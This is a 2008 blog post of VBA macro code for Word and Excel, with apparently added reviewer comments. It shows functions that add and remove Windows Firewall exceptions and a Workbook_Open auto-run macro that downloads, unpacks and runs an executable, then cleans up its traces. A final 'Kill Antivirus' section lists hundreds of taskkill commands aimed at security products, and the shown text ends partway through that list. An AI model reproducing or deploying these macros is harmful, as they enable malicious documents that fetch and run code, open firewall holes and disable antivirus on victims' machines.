Sunday, November 16, 2008
< PRE > tags suck.
Modifying Windows Firewall Rules from VBA
Function Add_App_To_Firewall(program_name, program_executable, program_scope)
    ' Adds an executable to the "authorized applications" (exceptions) list of
    ' the Windows Firewall profile that is currently active.
    '
    ' program_name       - value stored in the entry's Name property.
    ' program_executable - path stored in the entry's ProcessImageFileName.
    ' program_scope      - numeric scope stored in the entry's Scope property
    '                      (the caller on this page passes 1, local subnet).
    '
    ' No value is assigned to the function name, so nothing is returned.
    '
    ' NOTE(review): HNetCfg.FwMgr is the legacy Windows Firewall COM interface;
    ' the Add call normally needs administrative rights - confirm on the target
    ' OS. A firewall exception created by an Office macro is not normal document
    ' behaviour, so firewall-policy changes that originate from Office processes
    ' are worth auditing and alerting on.

    ' Only NET_FW_IP_VERSION_ANY is referenced below; the other constants are
    ' declared but unused in this function.
    Const NET_FW_PROFILE_DOMAIN = 0
    Const NET_FW_PROFILE_STANDARD = 1
    Const NET_FW_SCOPE_ALL_NAME = "All subnets"
    Const NET_FW_SCOPE_LOCAL_SUBNET_NAME = "Local subnet only"
    Const NET_FW_IP_VERSION_ANY = 2

    ' Firewall manager -> local policy -> profile in effect right now.
    Dim firewallManager
    Dim activeProfile
    Set firewallManager = CreateObject("HNetCfg.FwMgr")
    Set activeProfile = firewallManager.LocalPolicy.CurrentProfile

    ' Describe the application entry to be authorized.
    Dim authorizedApp
    Set authorizedApp = CreateObject("HNetCfg.FwAuthorizedApplication")
    With authorizedApp
        .ProcessImageFileName = program_executable
        .Name = program_name
        .Scope = program_scope
        .IpVersion = NET_FW_IP_VERSION_ANY
        .Enabled = True
    End With

    ' Error suppression starts here, so only a failing Add is swallowed; the
    ' caller gets no indication of whether the entry was actually created.
    On Error Resume Next
    activeProfile.AuthorizedApplications.Add authorizedApp
End Function
Function Remove_App_From_Firewall(program_executable)
    ' Removes an executable from the authorized-applications list of the
    ' Windows Firewall profile that is currently active.
    '
    ' program_executable - value passed to AuthorizedApplications.Remove; the
    '                      caller on this page passes the same path it used
    '                      when adding the entry.
    '
    ' No value is assigned to the function name, so nothing is returned.
    '
    ' Error suppression covers the whole body: a failure at any step (object
    ' creation, profile lookup, or the Remove itself) is silently ignored, so a
    ' stale exception can be left behind without the caller knowing.
    On Error Resume Next

    ' Firewall manager -> local policy -> current profile -> exceptions list.
    Dim authorizedApps
    Set authorizedApps = CreateObject("HNetCfg.FwMgr").LocalPolicy.CurrentProfile.AuthorizedApplications

    authorizedApps.Remove program_executable
End Function
As an example, here are the commands that download the Tiny Web Server from the internet, unzip it, add it to the Windows Firewall's allowed-exceptions list, create a quick .html file, start the server, run Internet Explorer pointed at this server, then kill the server, remove the firewall rule, and delete all of the files.
Sub Workbook_Open()
' Excel event handler: runs when the workbook is opened with macros enabled.
' Walks through the demo described in the text above: fetch and unpack a small
' web server into %TEMP%, add a firewall exception for it, serve one page to
' Internet Explorer, then stop the server and undo the changes.
'
' Download_File, Run_Program, Run_Cmd and the INVISIBLE / VISIBLE / WAIT /
' NOWAIT arguments are not defined in this listing; presumably they are helpers
' from elsewhere in the author's code - confirm before relying on their
' semantics.
'
' NOTE(review): what this leaves for a defender to observe is an Office
' application fetching an archive, an executable appearing under %TEMP%, a
' firewall exception being added and removed, and (presumably, via the helpers)
' child processes such as cmd/taskkill/iexplore. The final cleanup deletes the
' files, so process and firewall-change logging matter more than on-disk
' artifacts.

'Download tiny web server to the %TEMP% directory, use local copy of winzip to unzip
'Obviously in a real world application you'd want to bring your own unzipper
' The archive comes over plain HTTP and nothing checks its integrity before
' the extracted tiny.exe is run below.
Download_File "http://www.ritlabs.com/download/tinyweb/tinyweb.zip", Environ("TEMP") & "\tinyweb.zip"
Run_Program "winzip", "-e -o %TEMP%\tinyweb.zip %TEMP%", INVISIBLE, WAIT
' Scope values for the firewall entry; only NET_FW_SCOPE_LOCAL_SUBNET is used.
Const NET_FW_SCOPE_ALL = 0, NET_FW_SCOPE_LOCAL_SUBNET = 1, NET_FW_SCOPE_CUSTOM = 2
' Authorize tiny.exe for the local subnet under the name "tiny-local".
Add_App_To_Firewall "tiny-local", Environ("TEMP") & "\tiny.exe", NET_FW_SCOPE_LOCAL_SUBNET
' Create the single page the server will hand out.
Run_Cmd "echo iexplore-pwned > %TEMP%\index.html", INVISIBLE, WAIT
' Start the server with %TEMP% and 12345 as arguments (the browser below is
' pointed at port 12345), without waiting for it to exit.
Run_Program "%TEMP%\tiny.exe", "%TEMP% 12345", INVISIBLE, NOWAIT
' "Sleep" for a couple of seconds to allow tiny.exe to load
Run_Cmd "ping -n 2 127.0.0.1", INVISIBLE, WAIT
' Open the page in Internet Explorer and block until the browser is closed.
Run_Program "iexplore", "http://127.0.0.1:12345", VISIBLE, WAIT
' Force-terminate every process whose image name is tiny.exe.
Run_Cmd "taskkill /F /IM tiny.exe", INVISIBLE, WAIT
' Remove the firewall exception that was added above.
Remove_App_From_Firewall Environ("TEMP") & "\tiny.exe"
' From here on errors are ignored, so a file that is already missing does not
' stop the remaining deletions.
On Error Resume Next
Kill Environ("TEMP") & "\tinyweb.zip"
Kill Environ("TEMP") & "\SRC.zip"
Kill Environ("TEMP") & "\LICENSE.txt"
Kill Environ("TEMP") & "\File_id.diz"
Kill Environ("TEMP") & "\Readme.txt"
Kill Environ("TEMP") & "\Cgitest.zip"
Kill Environ("TEMP") & "\index.html"
Kill Environ("TEMP") & "\tiny.exe"
End Sub
How to Kill Antivirus from Word or Excel VBA
Function Build_Cmd_List(arrayCmds, command)
    ' Appends command to the end of the string array arrayCmds, growing the
    ' array by one element when needed.
    '
    ' arrayCmds - array of strings, modified in place. An empty string in
    '             slot 0 is treated as "nothing stored yet": in that case the
    '             array is not grown and the last slot is simply overwritten.
    ' command   - string to store in the last slot.
    '
    ' No value is assigned to the function name, so nothing is returned.
    Dim lastSlot
    lastSlot = UBound(arrayCmds)

    If arrayCmds(0) <> "" Then
        ' The array already holds data: add one slot and keep what is there.
        lastSlot = lastSlot + 1
        ReDim Preserve arrayCmds(lastSlot) As String
    End If

    arrayCmds(lastSlot) = command
End Function
Function Kill_AV()
Dim arrayCmds() As String
ReDim arrayCmds(0) As String
On Error Resume Next
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""_avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ackwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""adaware.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""advxdwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentsvr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""agentw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alertsvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alevir.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""alogserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""amon9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""anti-trojan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""antivirus.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ants.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""apimonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""aplica32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""apvxdwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""arr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atcon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atro55en.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atupdater.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""atwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""au.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""aupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""auto-protect.nav80try.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autodown.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autotrace.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""autoupdate.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avconsol.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ave32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgcc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwin95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-agnt95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icload95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""jedi.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lockdown2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""lookout.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""luall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""moolive.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""mpftray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""n32scanw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navapw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navlu32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navw32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""navwnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nisum.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""normist.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nupgrade.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""nvc95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""outpost.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""padmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavcl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavsched.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pavw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pccwin98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""pcfwallicon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""persfw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rav7win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""rescue.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""safeweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scan95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scanpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""scrscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""serv95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""smc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sphinx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""sweep95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tbscan.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tca.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-98.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""tds2-nt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vet95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vettray.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vscan40.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsecomr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vshwin32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""vsstat.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""webscanx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""wfindv32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""zonealarm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgserv9.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avguard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avgw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkpop.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkservice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avkwctl9.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avltmain.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avp32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpcc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpdos32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avptc32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avpupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsched32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avsynmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwinnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avwupsrv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitor9x.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxmonitornt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""avxquar.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""backweb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bargains.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bd_professional.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""beagle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""belt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidef.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bidserver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bipcpevalsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bisp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blackice.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""blss.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootconf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bootwarn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""borg2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bpc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""brasil.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bs120.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bundle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""bvt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccevtmgr.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ccpxysvc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cdp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfgwiz.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiadmin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfiaudit.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cfinet32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""claw95cf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""clean.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleaner3.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cleanpc.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""click.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmd32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmesys.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmgrdian.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cmon016.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""connectionmonitor.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpd.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpf9x206.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cpfnt206.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ctrl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwnb181.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""cwntdwmo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""datemanager.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dcomx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defalert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defscangui.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""defwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""deputy.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""divx.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllcache.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dllreg.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""doors.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpf.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpfsetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dpps2.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwatson.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drweb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""drwebupw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dssagent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""dvp95_0.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ecengine.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""efpeadm.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""emsw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ent.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""esafe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanhnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""escanv95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""espwatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ethereal.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""etrustcipe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""evpn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""exantivirus-cnet.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""exe.avxw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""expert.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""explore.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fameh32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fast.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fch32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fih32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""findviru.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""firewall.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fnrb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fprot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-prot95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fp-win_trial.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""frw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsaa.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530stbyb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav530wtbyb.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsav95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsgk32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsm32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsma32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""fsmb32.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""f-stopw.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gator.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbmenu.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gbpoll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""generics.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""gmt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""guard.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""guarddog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hacktracersetup.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbinst.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hbsrv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotactio.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hotpatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""htlog.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""htpatch.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hwpe.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxdl.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""hxiul.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamapp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamserv.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iamstats.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmasn.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ibmavsp.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icloadnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icmon.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsupp95.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""icsuppnt.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""idle.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedll.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iedriver.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iexplorer.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iface.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""ifw2000.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""inetlnfo.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""infus.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""infwin.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""init.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""intdel.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""intren.exe"""
Build_Cmd_List arrayCmds, "taskkill /F /IM ""iomon98.exe"""
